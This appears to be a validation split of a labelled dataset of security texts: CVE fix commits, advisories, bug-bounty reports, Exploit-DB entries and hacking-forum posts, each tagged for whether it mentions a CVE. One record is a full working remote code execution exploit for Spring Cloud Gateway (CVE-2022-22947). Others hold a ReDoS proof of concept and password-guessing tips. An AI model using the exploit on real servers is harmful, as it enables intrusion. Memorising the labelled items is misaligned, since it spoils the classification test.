+{"id": "ecbf76bbbd5d808e1d8a", "text": "XML Injection in Xerces Java affects Nokogiri\n\n[Severity: MEDIUM]\n\n## Summary\n\nNokogiri v1.13.4 updates the vendored `xerces:xercesImpl` from 2.12.0 to 2.12.2, which addresses [CVE-2022-23437](https://nvd.nist.gov/vuln/detail/CVE-2022-23437). That CVE is scored as CVSS 6.5 \"Medium\" on the NVD record.\n\nPlease note that this advisory only applies to the **JRuby** implementation of Nokogiri `< 1.13.4`.\n\n## Mitigation\n\nUpgrade to Nokogiri `>= v1.13.4`.\n\n## Impact\n\n### [CVE-2022-23437](https://nvd.nist.gov/vuln/detail/CVE-2022-23437) in xerces-J\n\n- **Severity**: Medium\n- **Type**: [CWE-91](https://cwe.mitre.org/data/definitions/91.html) XML Injection (aka Blind XPath Injection)\n- **Description**: There's a vulnerability within the Apache Xerces Java (XercesJ) XML parser when handling specially crafted XML document payloads. This causes, the XercesJ XML parser to wait in an infinite loop, which may sometimes consume system resources for prolonged duration. This vulnerability is present within XercesJ version 2.12.1 and the previous versions.\n- **See also**: https://github.com/advisories/GHSA-h65f-jvqw-m9fj\n\n", "source": "github_advisory", "timestamp": "2022-04-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "3922f22858eb1088d5e9", "text": "CVE: CVE-2022-27470\n\n[{'lang': 'en', 'value': 'SDL_ttf v2.0.18 and below was discovered to contain an arbitrary memory write via the function TTF_RenderText_Solid(). This vulnerability is triggered via a crafted TTF file.'}]\n\nFix commit: More integer overflow (see bug #187)\nMake sure that 'width + alignment' doesn't overflow, otherwise\nit could create a SDL_Surface of 'width' but with wrong 'pitch'", "source": "cvefixes", "timestamp": "2022-05-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "9f255dd4f13c8d85f120", "text": "CVE: CVE-2022-0570\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in Homebrew mruby prior to 3.2.'}]\n\nFix commit: codegen.c: fix a bug in `gen_values()`.\n\n- Fix limit handling that fails 15 arguments method calls.\n- Fix too early argument packing in arrays.", "source": "cvefixes", "timestamp": "2022-02-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "034301d55dfc5b0e562c", "text": "The parrot archive url of “open books” has changed currently its on, https://archive.parrotsec.org/parrot/misc/misc/openbooks/?C=N&O=D Screenshot of the mentioned url: Screenshot_20220112-014126_Chrome 1031×453 32.6 KB", "source": "parrotsec", "timestamp": "2022-01-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "264a13ece136183b79df", "text": "You have the ip address, you need the domain name - so dig it", "source": "hackthebox", "timestamp": "2023-09-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "4202bb1c20507ba42cc9", "text": "CVE: CVE-2022-1213\n\n[{'lang': 'en', 'value': 'SSRF filter bypass port 80, 433 in GitHub repository livehelperchat/livehelperchat prior to 3.67v. An attacker could make the application perform arbitrary requests, bypass CVE-2022-1191'}]\n\nFix commit: fix #1752", "source": "cvefixes", "timestamp": "2022-04-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "1bf7ee7ac141f8892804", "text": "CVE: CVE-2022-29188\n\n[{'lang': 'en', 'value': 'Smokescreen is an HTTP proxy. The primary use case for Smokescreen is to prevent server-side request forgery (SSRF) attacks in which external attackers leverage the behavior of applications to connect to or scan internal infrastructure. Smokescreen also offers an option to deny access to additional (e.g., external) URLs by way of a deny list. There was an issue in Smokescreen that made it possible to bypass the deny list feature by surrounding the hostname with square brackets (e.g. `[example.com]`). This only impacted the HTTP proxy functionality of Smokescreen. HTTPS requests were not impacted. Smokescreen version 0.0.4 contains a patch for this issue.'}]\n\nFix commit: Fix hostname parsing for square brackets", "source": "cvefixes", "timestamp": "2022-05-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "b1bb57d7b551e1a3e62e", "text": "CVE: CVE-2022-23612\n\n[{'lang': 'en', 'value': \"OpenMRS is a patient-based medical record system focusing on giving providers a free customizable electronic medical record system. Affected versions are subject to arbitrary file exfiltration due to failure to sanitize request when satisfying GET requests for `/images` & `/initfilter/scripts`. This can allow an attacker to access any file on a system running OpenMRS that is accessible to the user id OpenMRS is running under. Affected implementations should update to the latest patch version of OpenMRS Core for the minor version they use. These are: 2.1.5, 2.2.1, 2.3.5, 2.4.5 and 2.5.3. As a general rule, this vulnerability is already mitigated by Tomcat's URL normalization in Tomcat 7.0.28+. Users on older versions of Tomcat should consider upgrading their Tomcat instance as well as their OpenMRS instance.\"}]\n\nFix commit: Fix bug", "source": "cvefixes", "timestamp": "2022-02-22", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "ae03edf19ee39efd86c5", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2022-09-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "3dbb8f31706395f90d89", "text": "Okay, I got the flag. Try to use base64 encoding guys and take a good look at “copying”", "source": "hackthebox", "timestamp": "2023-04-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "731b88aa476adb4764ef", "text": "Code injection in ruby git\n\n[Severity: HIGH]\n\nruby-git versions prior to v1.13.0 allows a remote authenticated attacker to execute an arbitrary ruby code by having a user to load a repository containing a specially crafted filename to the product. This vulnerability is different from CVE-2022-46648.", "source": "github_advisory", "timestamp": "2023-01-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "8e1e7ebeb92ad2e236df", "text": "I struggled with this particular assessment like every other person trying to solve this challenge. However, I will like to tell you not to give up because patience is the key and sometimes, you have to think outside the box. Clue here is to use username-anarchy firstname lastname to generate possible username, then use cupp -i to generate possible password, don’t be too crazy filling all the parameters, You should be good with firstname, last name, special char and leet. This you can consult with the study material to use sed to remove possible password that doesn’t conform with the password policy. Major take away. Even with the clue above, you gonna find out that it takes forever and you might be feeling frustrated that you’re not on the right path which is something I encountered. But this is where I pull out my think outside the box card. I knew something is wrong somewhere, I immediately make a copy of the generated username, I removed some usernames and only left what I believe might be possible employee usernames in real enterprise environment. Possible user name for Jon Doe j.doe doe.j jon.doe jdoe doej If you follow this pattern, along with the password generated with cupp, you should get the ssh login withing 1-2mins", "source": "hackthebox", "timestamp": "2022-09-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "3dcc742e7940f990645d", "text": "Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)\n\n# Exploit Title: Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)\n# Google Dork: N/A\n# Date: 03/03/2022\n# Exploit Author: Carlos E. Vieira\n# Vendor Homepage: https://spring.io/\n# Software Link: https://spring.io/projects/spring-cloud-gateway\n# Version: This vulnerability affect Spring Cloud Gateway < 3.0.7 & < 3.1.1\n# Tested on: 3.1.0\n# CVE : CVE-2022-22947\n\nimport random\nimport string\nimport requests\nimport json\nimport sys\nimport urllib.parse\nimport base64\n\nheaders = { \"Content-Type\": \"application/json\" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'}\nproxies = {\n 'http': 'http://172.29.32.1:8081',\n 'https': 'http://172.29.32.1:8081',\n}\nid = ''.join(random.choice(string.ascii_lowercase) for i in range(8))\n\ndef exploit(url, command):\n\n payload = { \"id\": id, \"filters\": [{ \"name\": \"AddResponseHeader\", \"args\": { \"name\": \"Result\", \"value\": \"#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\\u0022\"+command+\"\\u0022).getInputStream()))}\"}}],\"uri\": \"http://example.com\"}\n\n commandb64 =base64.b64encode(command.encode('utf-8')).decode('utf-8')\n\n rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), proxies=proxies, verify=False)\n if(rbase.status_code == 201):\n print(\"[+] Stage deployed to /actuator/gateway/routes/\"+id)\n print(\"[+] Executing command...\")\n r = requests.post(url + '/actuator/gateway/refresh', headers=headers, proxies=proxies, verify=False)\n if(r.status_code == 200):\n print(\"[+] getting result...\")\n r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False)\n if(r.status_code == 200):\n get_response = r.json()\n clean(url, id)\n return get_response['filters'][0].split(\"'\")[1]\n else:\n print(\"[-] Error: Invalid response\")\n clean(url, id)\n exit(1)\n else:\n clean(url, id)\n print(\"[-] Error executing command\")\n\n\ndef clean(url, id):\n remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False)\n if(remove.status_code == 200):\n print(\"[+] Stage removed!\")\n else:\n print(\"[-] Error: Fail to remove stage\")\n\ndef banner():\n print(\"\"\"\n ###################################################\n # #\n # Exploit for CVE-2022-22947 #\n # - Carlos Vieira (Crowsec) #\n # #\n # Usage: #\n # python3 exploit.py #\n # #\n # Example: #\n # python3 exploit.py http://localhost:8080 'id' #\n # #\n ###################################################\n \"\"\")\n\ndef main():\n banner()\n if len(sys.argv) != 3:\n print(\"[-] Error: Invalid arguments\")\n print(\"[-] Usage: python3 exploit.py \")\n exit(1)\n else:\n url = sys.argv[1]\n command = sys.argv[2]\n print(exploit(url, command))\nif __name__ == '__main__':\n main()", "source": "exploitdb", "timestamp": "2022-03-07", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "024ee216ec85fff74232", "text": "[Deserialization of Untrusted Data] [CVE-2023-27531] Possible Deserialization of Untrusted Data vulnerability in Kredis JSON\n\nI made a report and patch at https://hackerone.com/reports/1702859 .\n\nhttps://discuss.rubyonrails.org/t/cve-2023-27531-possible-deserialization-of-untrusted-data-vulnerability-in-kredis-json/82467\n\n> There is a deserialization of untrusted data vulnerability in the Kredis JSON deserialization code. This vulnerability has been assigned the CVE identifier CVE-2023-27531.\n\n## Impact\n\n> Carefully crafted JSON data processed by Kredis may result in deserialization of untrusted data, potentially leading to deserialization of unexpected objects in the system.", "source": "hackerone", "timestamp": "2023-08-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "ea9dc159a1b6c6fd8bf0", "text": "CVE: CVE-2022-31063\n\n[{'lang': 'en', 'value': 'Tuleap is a Free & Open Source Suite to improve management of software developments and collaboration. In versions prior to 13.9.99.111 the title of a document is not properly escaped in the search result of MyDocmanSearch widget and in the administration page of the locked documents. A malicious user with the capability to create a document could force victim to execute uncontrolled code. Users are advised to upgrade. There are no known workarounds for this issue.'}]\n\nFix commit: request #27173: XSS via the title of a document\n\nChange-Id: Ibdae4792b76c297bf8d553ab9b37f5ae3d76cb2a", "source": "cvefixes", "timestamp": "2022-06-29", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "a6848148672d35996fa8", "text": "CVE: CVE-2021-23520\n\n[{'lang': 'en', 'value': 'The package juce-framework/juce before 6.1.5 are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip) via the ZipFile::uncompressEntry function in juce_ZipFile.cpp. This vulnerability is triggered when the archive is extracted upon calling uncompressTo() on a ZipFile object.'}]\n\nFix commit: ZipFile: Add path checks to uncompressEntry()", "source": "cvefixes", "timestamp": "2022-01-31", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c6277e89f7c8efd1f424", "text": "CVE: CVE-2022-1233\n\n[{'lang': 'en', 'value': 'URL Confusion When Scheme Not Supplied in GitHub repository medialize/uri.js prior to 1.19.11.'}]\n\nFix commit: fix(parse): handle excessive slashes in scheme-relative URLs\n\nreported by @zeyu2001 via huntr.dev", "source": "cvefixes", "timestamp": "2022-04-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "fd1933d517bbdcfcfe7d", "text": "CVE: CVE-2022-2522\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0061.'}]\n\nFix commit: patch 9.0.0061: ml_get error with nested autocommand\n\nProblem: ml_get error with nested autocommand.\nSolution: Also check line numbers for a nested autocommand. (closes #10761)", "source": "cvefixes", "timestamp": "2022-07-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "0b9e1a064242fddbc58b", "text": "CVE: CVE-2022-1735\n\n[{'lang': 'en', 'value': 'Classic Buffer Overflow in GitHub repository vim/vim prior to 8.2.4969.'}]\n\nFix commit: patch 8.2.4969: changing text in Visual mode may cause invalid memory access\n\nProblem: Changing text in Visual mode may cause invalid memory access.\nSolution: Check the Visual position after making a change.", "source": "cvefixes", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "1a85e4335c4f1995acfd", "text": "CVE: CVE-2022-21648\n\n[{'lang': 'en', 'value': 'Latte is an open source template engine for PHP. Versions since 2.8.0 Latte has included a template sandbox and in affected versions it has been found that a sandbox escape exists allowing for injection into web pages generated from Latte. This may lead to XSS attacks. The issue is fixed in the versions 2.8.8, 2.9.6 and 2.10.8. Users unable to upgrade should not accept template input from untrusted sources.'}]\n\nFix commit: PhpWriter: complex expression in strings prohibited in sandbox mode", "source": "cvefixes", "timestamp": "2022-01-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "44c3e00d711d41cbb8c3", "text": "another tip is to use filters as a range… I notice that errors has all the same size lets say 50 so you can use -fs 50-51 at the end to filter the errors and -mc 200 to show only the 200 ok responses. Another thing is, if you use the HTB virtual machine from the web you should get the wordlist from /usr/share/dirb/wordlists/common.txt you have the first 3 flags from there… I found 5 vhost but one of the flags are not correct and the ‘d’ one is tricky.", "source": "hackthebox", "timestamp": "2023-09-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "63d41658edb40966d653", "text": "Sqlmap Cheat Sheet: Commands, Options, and Advanced Features\n\nHi, Here another nice share from StationX! Enjoy!!! Sqlmap Cheat Sheet: Commands, Options, and Advanced Features StationX – 20 Oct 22 Sqlmap Cheat Sheet: Commands, Options, and Advanced Features Use this comprehensive sqlmap cheat sheet to easily lookup any command you need. It includes a special search and copy function. Download cheat sheets here: https://drive.google.com/drive/folders/132ptAPFrhVZAV5dMMK6Jk9HSA4UJl7Du", "source": "hackersploit", "timestamp": "2023-02-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "42a2774f3de808950d5d", "text": "CVE: CVE-2022-1444\n\n[{'lang': 'en', 'value': 'heap-use-after-free in GitHub repository radareorg/radare2 prior to 5.7.0. This vulnerability is capable of inducing denial of service.'}]\n\nFix commit: Redo minor cleanup in new_rbtree", "source": "cvefixes", "timestamp": "2022-04-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "67210f5b2c906b1c625a", "text": "CVE: CVE-2022-29779\n\n[{'lang': 'en', 'value': 'Nginx NJS v0.7.2 was discovered to contain a segmentation violation in the function njs_value_own_enumerate at src/njs_value.c.'}]\n\nFix commit: Fixed Array.prototype.slice() with slow \"this\" argument.\n\nPreviously, when \"this\" argument was not a fast array, but the \"deleted\" array\nwas a fast array, the \"deleted\" array may be left in uninitialized state if\n\"this\" argument had gaps.\n\nThis fix is to ensure that \"deleted\" is properly initialized.\n\nThis fixes #485 issue on Github.", "source": "cvefixes", "timestamp": "2022-06-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "4a029229153730eeb106", "text": "Test code in published microsoft-graph-core package exposes phpinfo()\n\n[Severity: MEDIUM]\n\n### Impact\n\nThe Microsoft Graph Core PHP SDK published packages which contained test code that enabled the use of the phpInfo() function from any application that could access and execute the file at vendor/microsoft/microsoft-graph-core/tests/GetPhpInfo.php. The phpInfo function exposes system information. \n\nThe vulnerability affects the GetPhpInfo.php script of the PHP SDK which contains a call to the phpinfo() function. \n\nThis vulnerability requires a misconfiguration of the server to be present so it can be exploited. For example, making the PHP application’s /vendor directory web accessible. \n\nThe combination of the vulnerability and the server misconfiguration would allow an attacker to craft an HTTP request that executes the phpinfo() method. The attacker would then be able to get access to system information like configuration, modules, and environment variables and later on use the compromised secrets to access additional data.\n\n### Patches\n\nThis problem has been patched in version 2.0.2.\n\n### Workarounds\n\nIf an immediate deployment with the updated vendor package is not available, you can perform the following temporary workarounds:\n- delete the vendor/microsoft/microsoft-graph-core/tests/GetPhpInfo.php file\n- remove access to the /vendor directory will remove this vulnerability\n- disable the phpinfo function\n\n### References\nFor more information about the vulnerability and the patch, users can refer to the following sources: \n\n- https://nvd.nist.gov/vuln/detail/CVE-2023-49103\n- https://github.com/microsoftgraph/msgraph-beta-sdk-php/compare/2.0.0...2.0.1 \n- https://github.com/microsoftgraph/msgraph-sdk-php-core/compare/2.0.1...2.0.2 \n- https://github.com/microsoftgraph/msgraph-sdk-php/compare/1.109.0...1.109.1 \n- https://owncloud.com/security-advisories/disclosure-of-sensitive-credentials-and-configuration-in-containerized-deployments/ ", "source": "github_advisory", "timestamp": "2023-12-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "7b572a7ca3c7bb00673b", "text": "[Uncontrolled Resource Consumption] @nextcloud/logger NPM package brings vulnerable ansi-regex version\n\n## Summary:\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to the sub-patterns [[\\\\]()#;?]* and (?:;[-a-zA-Z\\\\d\\\\/#&.:=?%@~_]*)*.\n\n## Details: \nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\n## Steps To Reproduce:\n\n 1. First I download the code (https://github.com/nextcloud/password_policy) I usual cat files and See the technologies that the site use and its versions I Found that You use `ansi-regex`\n 2. then I cat every file and find in package-lock.json has the version I have the versions of the ansi-regex with a lot of versions there some of some vulnerable and other update to the latest version and the vulnerable paths is \n```json\n},\n\t\t\t\t\"strip-ansi\": {\n\t\t\t\t\t\"version\": \"3.0.1\",\n\t\t\t\t\t\"resolved\": \"https://registry.npmjs.org/strip-ansi/-/strip-ansi-3.0.1.tgz\",\n\t\t\t\t\t\"integrity\": \"sha1-ajhfuIU9lS1f8F0Oiq+UJ43GPc8=\",\n\t\t\t\t\t\"requires\": {\n\t\t\t\t\t\t\"ansi-regex\": \"^2.0.0\"\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\t\t\"has-ansi\": {\n\t\t\t\"version\": \"2.0.0\",\n\t\t\t\"resolved\": \"https://registry.npmjs.org/has-ansi/-/has-ansi-2.0.0.tgz\",\n\t\t\t\"integrity\": \"sha1-NPUEnOHs3ysGSa8+8k5F7TVBbZE=\",\n\t\t\t\"requires\": {\n\t\t\t\t\"ansi-regex\": \"^2.0.0\"\n\t\t\t},\n\n\t\t\t\"dependencies\": {\n\t\t\t\t\"ansi-regex\": {\n\t\t\t\t\t\"version\": \"2.1.1\",\n\t\t\t\t\t\"resolved\": \"https://registry.npmjs.org/ansi-regex/-/ansi-regex-2.1.1.tgz\",\n\t\t\t\t\t\"integrity\": \"sha1-w7M6te42DYbg5ijwRorn7yfWVN8=\"\n\t\t\t\t}\n\n\t\t\t\t\"node_modules/babel-code-frame/node_modules/ansi-regex\": {\n\t\t\t\"version\": \"2.1.1\",\n\t\t\t\"resolved\": \"https://registry.npmjs.org/ansi-regex/-/ansi-regex-2.1.1.tgz\",\n\t\t\t\"integrity\": \"sha1-w7M6te42DYbg5ijwRorn7yfWVN8=\",\n\t\t\t\"engines\": {\n\t\t\t\t\"node\": \">=0.10.0\"\n\t\t\t}\n\t\t},\n\t\t\"node_modules/babel-code-frame/node_modules/strip-ansi\": {\n\t\t\t\"version\": \"3.0.1\",\n\t\t\t\"resolved\": \"https://registry.npmjs.org/strip-ansi/-/strip-ansi-3.0.1.tgz\",\n\t\t\t\"integrity\": \"sha1-ajhfuIU9lS1f8F0Oiq+UJ43GPc8=\",\n\t\t\t\"dependencies\": {\n\t\t\t\t\"ansi-regex\": \"^2.0.0\"\n\t\t\t}\n\t\t\t\"node_modules/has-ansi/node_modules/ansi-regex\": {\n\t\t\t\"version\": \"2.1.1\",\n\t\t\t\"resolved\": \"https://registry.npmjs.org/ansi-regex/-/ansi-regex-2.1.1.tgz\",\n\t\t\t\"integrity\": \"sha1-w7M6te42DYbg5ijwRorn7yfWVN8=\",\n\t\t\t\"engines\": {\n\t\t\t\t\"node\": \">=0.10.0\"\n\t\t\t}\n\t\t},\n```\n3. then I found that every version of ansi-regex before 4.1.1 as you see in the code you use 2.11,2.0.0,3.0.1 and these versions are vulnerable to Regular Expression Denial of Service (ReDoS) as every policy that Denial of service attack is out of scope so I didn't try anything to not make any damage to your work but I want to report it to you to investigate on that and update to the fixed version to denied this attack from happening. \n4. this is a poc that attacker can use to \n\n#POC\n```\nimport ansiRegex from 'ansi-regex';\n\nfor(var i = 1; i <= 50000; i++) { var time = Date.now(); var attack_str = \"\\u001B[\"+\";\".repeat(i*10000); ansiRegex().test(attack_str) var time_cost = Date.now() - time; console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost+\" ms\") \n```\n# Fix: \nupdate to these (4.1.1, 5.0.1, and 6.0.1) like you do in most of your code. \n\n## Supporting Materials:\n\nthis useful links that can you check on this vuln\n1. https://www.cve.org/CVERecord?id=CVE-2021-3807\n2. https://cwe.mitre.org/data/definitions/400.html\n3. https://security.snyk.io/vuln/SNYK-JS-ANSIREGEX-1583908\n\n## Impact\n\nthe attacker aimed at making a system inaccessible t", "source": "hackerone", "timestamp": "2022-07-29", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "86a3c0a235f5154eecb5", "text": "CVE: CVE-2022-35414\n\n[{'lang': 'en', 'value': 'softmmu/physmem.c in QEMU through 7.0.0 can perform an uninitialized read on the translate_fail path, leading to an io_readx or io_writex crash.'}]\n\nFix commit: target/loongarch: Clean up tlb when cpu reset\n\nWe should make sure that tlb is clean when cpu reset.\n\nSigned-off-by: Song Gao \nMessage-Id: <20220705070950.2364243-1-gaosong@loongson.cn>\nReviewed-by: Richard Henderson \nSigned-off-by: Richard Henderson ", "source": "cvefixes", "timestamp": "2022-07-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "382b7c508efcf3b9c3fb", "text": "CVE: CVE-2022-23626\n\n[{'lang': 'en', 'value': 'm1k1o/blog is a lightweight self-hosted facebook-styled PHP blog. Errors from functions `imagecreatefrom*` and `image*` have not been checked properly. Although PHP issued warnings and the upload function returned `false`, the original file (that could contain a malicious payload) was kept on the disk. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue.'}]\n\nFix commit: check image create errors.", "source": "cvefixes", "timestamp": "2022-02-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "432e6424adc64f83bbed", "text": "Every time I spawned the target, it was normal at first. After a few seconds, I can’t connect to the target. image 665×304 12.5 KB", "source": "hackthebox", "timestamp": "2022-10-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "d2f35762bd36eb52159d", "text": "I can’t get the lab to work. I tried now for 5 days to get it working. Normally I use my own kali linux Visual Studio Codium in Python, but for C# it is a struggle with the libraries import ??? I did all the sections, except the Skills Assessment. I also tried Visual Studio Code and even installed on my Windows machine Visual Studio but I keep getting stuck on library Assessment.dll. I need this for knowing the paths to smuggler the Apache server because it’s vulnerable. With Ffuf I did not succeed. Furthermore I tried to parse the .dll for the wordlist but no success either. Please help me to get the last flag to finish this HTB module!!!", "source": "hackthebox", "timestamp": "2023-10-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "94c26aad028cececd693", "text": "About the Reset Token: It took me 2 days to get all the details right! How i solved it: – The Token formation schema is the same as the CVE indeed – Python Script Implementing Threads (you will send a couple thousand of requests) – “Epoch in Milliseconds” is int(round(time.time() * 1000) in Python – Fire the first request (htbuser) to create and then fire the guessings for the htbadmin in the script – i did use a wider interval T-2000 T+2000 Obs: you wont be able to match the HTBUSER token unless you know exactly the milliseconds when it was created (and you dont need it, dont waste time with that).", "source": "hackthebox", "timestamp": "2023-10-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "9d06e64e3011d7c7e57e", "text": "CVE: CVE-2022-24728\n\n[{'lang': 'en', 'value': 'CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. A vulnerability has been discovered in the core HTML processing module and may affect all plugins used by CKEditor 4 prior to version 4.18.0. The vulnerability allows someone to inject malformed HTML bypassing content sanitization, which could result in executing JavaScript code. This problem has been patched in version 4.18.0. There are currently no known workarounds.'}]\n\nFix commit: Code refactoring.", "source": "cvefixes", "timestamp": "2022-03-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "0674b900968eaac06d6e", "text": "How to gain experience in web pentesting?\n\nHI guys. I know how to do web pentest theoretically but I don’t have a experience about it. I mean I have worked with just vulnerable machines not real web sites. So what do you recommend me. I don’t even know how to write a report. Where should I start ?", "source": "hackersploit", "timestamp": "2022-10-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "4b686cd96319fe7e749b", "text": "Test code in published microsoft-graph-beta package exposes phpinfo()\n\n[Severity: MEDIUM]\n\n### Impact\n\nThe Microsoft Graph Beta PHP SDK published packages which contained test code that enabled the use of the phpInfo() function from any application that could access and execute the file at vendor/microsoft/microsoft-graph-beta/tests/GetPhpInfo.php. The phpInfo function exposes system information. \n\nThe vulnerability affects the GetPhpInfo.php script of the PHP SDK which contains a call to the phpinfo() function. \n\nThis vulnerability requires a misconfiguration of the server to be present so it can be exploited. For example, making the PHP application’s /vendor directory web accessible. \n\nThe combination of the vulnerability and the server misconfiguration would allow an attacker to craft an HTTP request that executes the phpinfo() method. The attacker would then be able to get access to system information like configuration, modules, and environment variables and later on use the compromised secrets to access additional data.\n\n### Patches\n\nThis problem has been patched in dependencies of version 2.0.1.\n\n### Workarounds\n\nIf an immediate deployment with the updated vendor package is not available, you can perform the following temporary workarounds:\n- delete the vendor/microsoft/microsoft-graph-beta/tests/GetPhpInfo.php file\n- remove access to the /vendor directory will remove this vulnerability\n- disable the phpinfo function\n\n### References\nFor more information about the vulnerability and the patch, users can refer to the following sources: \n\n- https://nvd.nist.gov/vuln/detail/CVE-2023-49103\n- https://github.com/microsoftgraph/msgraph-beta-sdk-php/compare/2.0.0...2.0.1 \n- https://github.com/microsoftgraph/msgraph-sdk-php-core/compare/2.0.1...2.0.2 \n- https://github.com/microsoftgraph/msgraph-sdk-php/compare/1.109.0...1.109.1 \n- https://owncloud.com/security-advisories/disclosure-of-sensitive-credentials-and-configuration-in-containerized-deployments/ ", "source": "github_advisory", "timestamp": "2023-12-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "68e2b538c490a829188d", "text": "Adlisting Classified Ads 2.14.0 - WebPage Content Information Disclosure\n\n# Exploit Title: Adlisting Classified Ads 2.14.0 - WebPage Content Information Disclosure\n# Exploit Author: CraCkEr\n# Date: 25/07/2023\n# Vendor: Templatecookie\n# Vendor Homepage: https://templatecookie.com/\n# Software Link: https://templatecookie.com/demo/adlisting-classified-ads-script\n# Version: 2.14.0\n# Tested on: Windows 10 Pro\n# Impact: Sensitive Information Leakage\n# CVE: CVE-2023-4168\n\n\n## Description\n\nInformation disclosure issue in the redirect responses, When accessing any page on the website,\nSensitive data, such as API keys, server keys, and app IDs, is being exposed in the body of these redirects.\n\n\n## Steps to Reproduce:\n\nWhen you visit any page on the website, like:\n\nhttps://website/ad-list?category=electronics\nhttps://website/ad-list-search?page=2\nhttps://website/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword=\n\nin the body page response there's information leakage for\n\n+---------------------+\ngoogle_map_key\napi_key\nauth_domain\nproject_id\nstorage_bucket\nmessaging_sender_id\napp_id\nmeasurement_id\n+---------------------+\n\n\nNote: The same information leaked, such as the API keys, server keys, and app ID, was added to the \"Firebase Push Notification Configuration\" in the Administration Panel.\n\nSettings of \"Firebase Push Notification Configuration\" in the Administration Panel, on this Path:\n\nhttps://website/push-notification (Login as Administrator)\n\n\n\n[-] Done", "source": "exploitdb", "timestamp": "2023-08-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "0a2a736dfa33261fd698", "text": "Pimcore Unrestricted Upload of File with Dangerous Type\n\n[Severity: HIGH]\n\nIn Pimcore before 5.7.1, an attacker with limited privileges can bypass file-extension restrictions via a 256-character filename, as demonstrated by the failure of automatic renaming of .php to .php.txt for long filenames, a different vulnerability than CVE-2019-10867 and CVE-2019-16317.", "source": "github_advisory", "timestamp": "2022-05-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "798fcefcd8b6b6e717b1", "text": "CVE: CVE-2022-0122\n\n[{'lang': 'en', 'value': 'forge is vulnerable to URL Redirection to Untrusted Site'}]\n\nFix commit: Remove forge.util.parseUrl.\n\n- Switch URL parsing to the WHATWG URL Standard `URL` API.\n- Older browser or Node.js usage of related code might now require a URL\n polyfill.", "source": "cvefixes", "timestamp": "2022-01-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
